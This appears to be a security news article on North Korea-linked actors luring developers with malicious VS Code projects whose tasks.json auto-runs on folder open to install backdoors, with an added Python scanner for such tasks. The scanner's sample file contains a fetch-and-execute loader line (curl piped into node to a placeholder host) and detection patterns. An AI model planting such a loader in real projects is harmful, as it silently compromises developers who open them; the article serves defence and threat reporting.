North Korea-Linked Actors Target Developers Using Malicious Visual Studio Code Projects

The North Korean threat actors behind the long-running Contagious Interview campaign have now been seen abusing malicious Microsoft Visual Studio Code (VS Code) projects as initial access lures to deliver a backdoor to developer workstations and other endpoints.

This update shows ongoing refinement of a technique first documented in December 2025, according to Jamf Threat Labs.

“This activity involved the deployment of a backdoor implant that provides remote code execution capabilities on the victim system,” security researcher Thijs Xhaflaire said in a report shared with The Hacker News.

First reported publicly by OpenSourceMalware last month, the intrusion pattern centers on instructing targets to clone a GitHub, GitLab, or Bitbucket repository and open the project in VS Code as part of what is framed as a technical interview or job assessment.

The objective is to abuse VS Code task configuration files to trigger execution of malicious payloads hosted on Vercel domains, selected according to the victim host’s operating system. Using the “runOn: folderOpen” option, the task is configured to run automatically whenever that file, or any file in the project directory, is opened in VS Code. This chain ultimately deploys BeaverTail and InvisibleFerret.

Later waves of the campaign have been found to hide multi-stage droppers inside task configuration files by masquerading the malware as benign spell-check dictionaries. This acts as a fallback when the task cannot obtain the payload from the Vercel domain.

Consistent with earlier activity, obfuscated JavaScript embedded in these files runs as soon as the victim opens the project in the integrated development environment (IDE). It reaches out to a remote server (“ip-regions-check.vercel[.]app”) and executes whatever JavaScript code is returned. The final stage of the sequence is another heavily obfuscated JavaScript payload.

Jamf reports an additional evolution in this campaign: the operators are using a previously undocumented infection path to deliver a backdoor with remote code execution on compromised hosts. The initial trigger is unchanged – the sequence starts when a user clones and opens a malicious Git repository in VS Code.

“When the project is opened, Visual Studio Code prompts the user to trust the repository author,” Xhaflaire explained. “If that trust is granted, the application automatically processes the repository’s tasks.json configuration file, which can result in embedded arbitrary commands being executed on the system.”

“On macOS systems, this results in the execution of a background shell command that uses nohup bash -c in combination with curl -s to retrieve a JavaScript payload remotely and pipe it directly into the Node.js runtime. This allows execution to continue independently if the Visual Studio Code process is terminated, while suppressing all command output.”
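As an added example (not code from Jamf’s report or from the campaign), the following Python scanner reads a repository’s .vscode/tasks.json, tolerates the JSON-with-comments syntax VS Code accepts, and flags tasks that run on folderOpen and whose command fetches remote content into an interpreter, the chain described in the quoted paragraph above and in the earlier task-configuration description; the sample tasks.json and its domain are constructed placeholders, not real indicators.

```python
import json
import re

# Added example, not code from the Jamf/OpenSourceMalware reports: flag tasks.json entries that
# auto-run on folderOpen and whose command pulls remote content into an interpreter.
SUSPICIOUS = [
    ("remote-fetch", re.compile(r"\b(curl|wget)\b|Invoke-WebRequest|\biwr\b", re.I)),
    ("pipe-to-interpreter", re.compile(r"\|\s*(node|bash|sh|python3?|powershell)\b", re.I)),
    ("detach", re.compile(r"\bnohup\b", re.I)),
]

def strip_jsonc(text: str) -> str:
    """tasks.json is JSON-with-comments: drop /* */ and full-line // comments, trailing commas."""
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.S)
    text = re.sub(r"^\s*//.*$", "", text, flags=re.M)
    return re.sub(r",(\s*[}\]])", r"\1", text)

def task_command(task: dict) -> str:
    """Join command and args so patterns are matched against the whole shell line."""
    parts = [str(task.get("command", ""))] + [str(a) for a in task.get("args", [])]
    return " ".join(p for p in parts if p)

def scan_tasks_json(text: str) -> list:
    """Return one finding per task that both auto-runs on folderOpen and looks like a loader."""
    findings = []
    for task in json.loads(strip_jsonc(text)).get("tasks", []):
        if task.get("runOptions", {}).get("runOn") != "folderOpen":
            continue  # only tasks VS Code starts without a user action are of interest
        cmd = task_command(task)
        hits = [name for name, rx in SUSPICIOUS if rx.search(cmd)]
        if hits:
            findings.append({"label": task.get("label", "<unnamed>"), "command": cmd, "indicators": hits})
    return findings

# Constructed sample mirroring the reported chain; the domain is a placeholder, not a real indicator.
SAMPLE = '''{
  "version": "2.0.0",
  "tasks": [
    // constructed sample, not a real lure
    { "label": "setup", "type": "shell",
      "command": "nohup bash -c 'curl -s https://payload.example.invalid/x.js | node' >/dev/null 2>&1 &",
      "runOptions": { "runOn": "folderOpen" } },
    { "label": "build", "type": "shell", "command": "npm run build", "runOptions": { "runOn": "folderOpen" }, },
  ]
}'''

if __name__ == "__main__":
    for f in scan_tasks_json(SAMPLE):
        print(f"[!] task '{f['label']}' auto-runs on folderOpen: {f['indicators']} -> {f['command']}")
```

A benign folderOpen task (the constructed "build" entry) is not reported, so the scanner can run over every freshly cloned repository before the VS Code trust prompt is answered.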

The JavaScript payload hosted on Vercel contains the primary backdoor logic, implementing a persistent execution loop that collects basic host details and interacts with a remote server to support remote code execution, system fingerprinting, and ongoing C2 communication.

In one observed case, the Apple device management team noted that additional JavaScript instructions were executed around eight minutes after the initial compromise. The newly fetched JavaScript is built to beacon to the server every five seconds, execute extra JavaScript, and scrub traces of its own activity when instructed by the operator. Based on inline comments and language style in the source, the script is suspected to have been authored or assisted by an artificial intelligence (AI) tool.

DPRK-linked threat actors have a documented focus on software engineers, especially those in cryptocurrency, blockchain, and fintech environments, because these users often hold privileged access to financial assets, wallets, and core technical infrastructure.

Compromising these users’ accounts and endpoints can give the attackers access to source code, intellectual property, internal services, and direct paths to steal digital assets. The steady adjustment of tradecraft here appears aimed at increasing success rates for both espionage and financially motivated activity in support of the heavily sanctioned regime.

The development comes as Red Asgard detailed its investigation into a malicious repository that uses a VS Code task configuration to retrieve obfuscated JavaScript, which then delivers a full-featured backdoor named Tsunami (aka TsunamiKit) together with an XMRig cryptocurrency miner.

Another publication from Security Alliance last week described the same VS Code task abuse in a case where an unidentified victim was contacted via LinkedIn. The adversaries posed as the chief technology officer of a project called Meta2140 and shared a Notion[.]so link containing a technical assignment and a URL to a Bitbucket repository delivering the malicious code.

Notably, the attack chain is built with two additional fallback paths: pulling in a malicious npm dependency named “grayavatar” or executing JavaScript responsible for retrieving a more complex Node.js controller. That controller runs five separate modules to capture keystrokes, take screenshots, scan the system home directory for sensitive files, replace wallet addresses copied to the clipboard, steal browser credentials, and maintain a persistent connection to a remote server.

The malware then sets up a dedicated Python environment through a stager script, enabling further data theft, XMRig-based cryptocurrency mining, keylogging, and AnyDesk deployment for remote interactive access. The Node.js and Python components are referred to as BeaverTail and InvisibleFerret, respectively.

For defenders, these observations show that the state-aligned operators are actively testing and running several delivery mechanisms in parallel to maximize compromise rates.

“This activity highlights the continued evolution of DPRK-linked threat actors, who consistently adapt their tooling and delivery mechanisms to integrate with legitimate developer workflows,” Jamf said. “The abuse of Visual Studio Code task configuration files and Node.js execution demonstrates how these techniques continue to evolve alongside commonly used development tools.”
